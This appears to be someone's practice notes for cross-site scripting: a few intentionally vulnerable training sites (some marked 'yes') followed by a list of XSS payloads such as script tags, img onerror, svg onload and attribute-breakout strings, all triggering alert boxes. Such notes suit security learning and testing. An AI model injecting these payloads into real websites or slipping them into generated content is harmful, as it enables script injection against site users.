yes : http://xss-game.appspot.com/level1/frame
yes : http://testphp.vulnweb.com/search.php
https://demo.owasp-juice.shop/#/login
http://testphp.vulnweb.com/login.php
commands:

<script>alert('XSS')</script>

<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<svg onload=alert('XSS')>

<iframe src="javascript:alert('XSS')"></iframe>
<body onload=alert('XSS')>
"><script>alert('XSS')</script>
"><img src=x onerror=alert('XSS')>
" onmouseover="alert('XSS')
<a href="javascript:alert('XSS')">Click me</a>
<details open ontoggle=alert('XSS')>
